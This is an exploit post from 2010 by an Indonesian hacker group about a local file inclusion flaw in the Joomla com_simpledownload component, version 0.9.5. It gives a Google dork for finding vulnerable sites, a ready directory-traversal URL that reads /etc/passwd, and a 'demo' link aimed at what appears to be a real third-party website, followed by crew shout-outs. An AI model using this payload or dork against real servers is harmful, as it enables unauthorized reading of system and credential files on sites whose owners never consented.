[!]===========================================================================[!] [~] Joomla Component simpledownload LFI Vulnerability [~] Author : Xr0b0t (nyco.danis@gmail.com) [~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com [~] Date : 16 Mei, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://joomla.joelrowley.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"com_simpledownload" ;) [+] Version : 0.9.5 maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1//index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA] [ XpL ] http://127.0.0.1//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.smiledentaljournal.com//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../etc/passwd etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] kaMtiEz Ndang Rene... [+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot [+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212 [ NOTE ] [+] OJOK JOTOS2an YO .. [+] Minggir semua Arumbia Team Mau LEwat ;) [+] MBEM : lup u :"> [ QUOTE ] [+] INDONESIANCODER still r0x... [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat .. [+] Malang Cyber Crew & Magelang Cyber Community